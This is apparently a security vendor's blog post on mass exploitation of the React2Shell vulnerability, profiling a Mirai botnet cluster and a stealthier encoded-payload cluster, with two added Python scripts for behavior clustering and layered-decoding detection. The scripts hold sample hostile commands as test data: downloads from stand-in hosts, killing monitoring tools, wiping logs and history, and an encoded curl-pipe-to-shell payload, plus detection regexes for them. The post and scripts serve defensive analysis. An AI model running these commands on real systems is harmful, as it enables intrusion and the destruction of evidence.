In December 2025, the disclosure of CVE-2025-55812, widely known as React2Shell, triggered immediate mass exploitation across the internet. The vulnerability allows unauthenticated remote code execution in React Server Components — giving attackers direct control of exposed systems.

Within hours, nation-state actors, botnets, and cybercriminal groups were actively weaponizing it.

Trinity Cyber stopped thousands of React2Shell exploitation attempts in real-time across its Active Network Defense platform. Among them, two distinct attack clusters stood out, revealing how modern threat actors approach the same vulnerability in radically different ways.


Together, they offer a clear lesson: attackers don’t just exploit vulnerabilities — they adapt their payloads to defeat traditional security tools.

Why React2Shell Was So Dangerous

React is one of the most widely used JavaScript frameworks on the internet. React2Shell quickly became one of the most critical vulnerabilities of the year because:

  • No authentication required
  • Simple to exploit
  • Internet-facing apps exposed immediately
  • Rapid weaponization by attackers of all skill levels

Much like Log4Shell before it, React2Shell triggered a global race, with defenders rushing to patch while attackers rushed to compromise.

What Trinity Cyber Observed

Over three months, Trinity Cyber analyzed thousands of real-world React2Shell payloads. Instead of treating them individually, analysts grouped attacks by behavior, which revealed two of the most interesting, and most opposite, exploitation strategies.

Our technical brief provides a comprehensive analysis of both the Teapot and Little Dash clusters and details how Trinity Cyber’s Full Content Inspection™ (FCI) provides coverage for both.

Cluster One: “Teapot” — Mirai at Internet Scale

The Teapot cluster was a classic Mirai botnet campaign — but with a twist.

Mirai operators rapidly adapted React2Shell into their automated exploitation engine, aggressively targeting systems across 12 Linux architectures, including ARM, MIPS, PowerPC, and x86.

What made this campaign unusual was its anti-research tactics.

When analysts attempted to retrieve payloads with unfamiliar user agents, the servers responded with HTTP 418 (“I’m a teapot”), a rarely used response code that the operators used to block researchers from further analysis. Only requests mimicking real Mirai binaries successfully retrieved the malware.

Once executed, payloads:

  • Downloaded architecture-specific malware
  • Killed monitoring tools
  • Wiped logs and execution traces
  • Connected to shared command-and-control infrastructure

This was Mirai doing what it does best: fast, automated, and ruthlessly efficient.
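As an added illustration, not code from the post or from Trinity Cyber, the script below shows how a defender can do the behavior-based grouping the post describes: each session's command lines are mapped to the four post-execution behavior classes listed above (download, architecture-specific binary, killing monitoring, wiping traces), and sessions with identical behavior fingerprints are clustered together. The regexes are my own assumptions, and the process records, the hosts `stage.invalid`, `mirror.example.org` and `203.0.113.9`, and the process names are constructed placeholders, not captured samples.

```python
import re
from collections import defaultdict

# Behaviour classes taken from the post's description of the Teapot post-exploitation
# steps, mapped to command-line indicators. These regexes are illustrative assumptions,
# not Trinity Cyber's detection content.
BEHAVIOURS = {
    "download":     re.compile(r"\b(?:wget|curl|tftp)\b"),
    "arch_binary":  re.compile(r"\.(?:arm\d?|mips(?:el)?|ppc|powerpc|x86(?:_64)?|i[36]86)\b"),
    "kill_monitor": re.compile(r"\b(?:pkill|killall)\b|\bkill\s+-9\b"),
    "wipe_traces":  re.compile(r"\brm\s+-\w*f\w*\s+\S*(?:/var/log|\.bash_history)|\bhistory\s+-c\b"),
}

# Constructed process-execution records as (session id, command line). Not real captures;
# the hosts and the process names "sensor-agent"/"logshipper" are placeholders.
SAMPLE_EVENTS = [
    ("s1", "wget http://stage.invalid/bins/bot.mips -O /tmp/.x"),
    ("s1", "chmod +x /tmp/.x; /tmp/.x"),
    ("s1", "pkill -9 sensor-agent"),
    ("s1", "rm -rf /var/log/* ~/.bash_history"),
    ("s2", "curl http://stage.invalid/bins/bot.arm7 -o /tmp/.x"),
    ("s2", "killall -9 logshipper"),
    ("s2", "history -c"),
    ("s3", "wget https://mirror.example.org/tool.tar.gz"),   # ordinary admin download
    ("s3", "tar xzf tool.tar.gz"),
    ("s4", "curl http://203.0.113.9/bins/.x.x86 -o /tmp/.y"),  # partial chain only
]


def fingerprint(commands):
    """Set of behaviour classes observed across one session's command lines."""
    seen = set()
    for cmd in commands:
        for name, rx in BEHAVIOURS.items():
            if rx.search(cmd):
                seen.add(name)
    return frozenset(seen)


def cluster(events):
    """Group sessions whose behaviour fingerprints are identical.

    Returns {sorted tuple of behaviour names: sorted list of session ids}.
    """
    per_session = defaultdict(list)
    for sid, cmd in events:
        per_session[sid].append(cmd)
    groups = defaultdict(list)
    for sid, cmds in per_session.items():
        groups[tuple(sorted(fingerprint(cmds)))].append(sid)
    return {fp: sorted(sids) for fp, sids in groups.items()}


def full_chain_sessions(events, required=frozenset(BEHAVIOURS)):
    """Sessions that exhibit every behaviour class, i.e. the complete Teapot-style chain."""
    return sorted(sid for fp, sids in cluster(events).items()
                  if required <= set(fp) for sid in sids)


if __name__ == "__main__":
    for fp, sids in cluster(SAMPLE_EVENTS).items():
        print(f"{len(sids)} session(s) {sids}: {', '.join(fp) or 'no indicators'}")
    print("full chain:", full_chain_sessions(SAMPLE_EVENTS))
```

Sessions s1 and s2 use different utilities at every step, yet land in the same cluster because the fingerprint is built from behavior classes rather than exact strings; the benign download in s3 and the partial chain in s4 fall into their own groups, which is the kind of separation that keeps a behavior-based rule from firing on routine administration.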

Cluster Two: “Little Dash” — Precision Over Volume

In contrast, Little Dash appeared only 45 times across three days — but showed significantly higher sophistication.

These payloads included:

  • Web Application Firewall evasion using Unicode encoding
  • Oversized payloads to bypass filters
  • Multiple decoding layers
  • AES encryption to hide malicious content

Once decrypted, the attack chain is laid out in the post's graphic:

[Figure: Once decrypted, the attack chain]

The design strongly suggests preparation for long-term access — and possibly self-propagating exploitation.

Where Teapot relied on speed and scale, Little Dash relied on stealth and evasion.

Why Detection-Only Security Struggles

Despite their differences, both clusters shared one critical dependency:

The malicious payload had to reach the target system.

Traditional security tools rely heavily on:

  • Known signatures
  • Domain reputation
  • Post-execution telemetry
  • Alert-driven response

When payloads are encrypted, obfuscated, or novel, those controls often fail.
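The following script is an added example (not code from the post or from Trinity Cyber) that puts the Little Dash evasion list and the signature-failure point together: a constructed request body hides a generic "download and pipe to a shell" one-liner behind Unicode escapes, percent-encoding and base64, then pads it with 4 KiB of filler. A signature applied to the raw bytes misses it, a filter that only inspects the first kilobyte misses it, and only a scanner that decodes every layer of the full content matches. The signature regex, the decoders, the `example.invalid` host and the payload itself are all my own constructed assumptions.

```python
import base64
import re
from urllib.parse import quote, unquote

# Generic signature for a "fetch a remote script and pipe it to a shell" one-liner.
# Assumed for illustration; it is not Trinity Cyber's detection content.
DOWNLOAD_AND_RUN = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
MAX_DEPTH = 8  # bound the peeling loop so a hostile body cannot keep the scanner decoding forever


def _is_text(s):
    return all(c.isprintable() or c in "\r\n\t" for c in s)


def _decode_unicode(s):
    # \u0075 -> 'u': JSON-style escapes that a byte-oriented signature never sees through.
    return UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def _decode_percent(s):
    return unquote(s)


def _decode_b64_tokens(s):
    # Replace each base64-looking token with its decoded text, but only when the result is
    # printable; filler such as a long run of 'A's decodes to NUL bytes and is left alone.
    def repl(m):
        tok = m.group(0)
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
            text = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return tok
        return text if _is_text(text) else tok
    return B64_TOKEN.sub(repl, s)


DECODERS = (
    ("unicode-escape", _decode_unicode),
    ("percent", _decode_percent),
    ("base64", _decode_b64_tokens),
)


def normalize(body):
    """Peel encoding layers until the text stops changing; return (text, layers peeled in order)."""
    layers, cur = [], body
    for _ in range(MAX_DEPTH):
        nxt = cur
        for name, fn in DECODERS:
            out = fn(nxt)
            if out != nxt:
                layers.append(name)
                nxt = out
        if nxt == cur:
            break
        cur = nxt
    return cur, layers


def raw_signature_hit(body):
    """The signature applied to the wire bytes exactly as received."""
    return bool(DOWNLOAD_AND_RUN.search(body))


def scan(body, inspect_limit=None):
    """Normalize, then match. inspect_limit emulates a filter that only examines the first N bytes."""
    view = body if inspect_limit is None else body[:inspect_limit]
    text, layers = normalize(view)
    return bool(DOWNLOAD_AND_RUN.search(text)), layers


def build_constructed_payload():
    """Constructed request body (not a captured sample) using the post's evasion tricks:
    Unicode escapes, then percent-encoding, then base64, placed behind 4 KiB of filler."""
    inner = "c\\u0075rl http://example.invalid/x.sh | s\\u0068"   # Unicode-escaped 'curl ... | sh'
    wrapped = base64.b64encode(quote(inner, safe="").encode()).decode()
    return "A" * 4096 + "&payload=" + wrapped


if __name__ == "__main__":
    body = build_constructed_payload()
    print("raw signature:", raw_signature_hit(body))            # False
    print("first 1 KiB only:", scan(body, inspect_limit=1024))  # (False, [])
    print("full content:", scan(body))                          # (True, ['base64', 'percent', 'unicode-escape'])
```

The bounded loop and the printability check are the two details that matter in practice: without a depth limit, a nested body becomes a decompression-style resource drain on the inspection point, and without the printability check the scanner would "decode" ordinary long alphanumeric tokens into garbage and match on noise.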

How Trinity Cyber Stopped Both Attacks

Trinity Cyber’s FCI inspects live network traffic before execution — regardless of encryption, payload size, or evasion technique.

Instead of alerting after compromise, FCI:

  • Parses full sessions in real time
  • Identifies malicious behavior
  • Surgically removes malicious content inline

That’s why Trinity Cyber prevented both high-volume Mirai exploitation and stealthy precision attacks without blocking workflows or generating alert fatigue.

Final Takeaway

React2Shell illustrates how modern exploitation unfolds:

  • Some attackers move fast and loud
  • Others move quietly and surgically
  • All depend on payload delivery

If defenders can’t see the full content of network traffic, they can’t stop modern attacks.

See Active Network Defense in Action

Want to see how Trinity Cyber defeats threats like React2Shell before they reach your environment? Schedule a live demo today.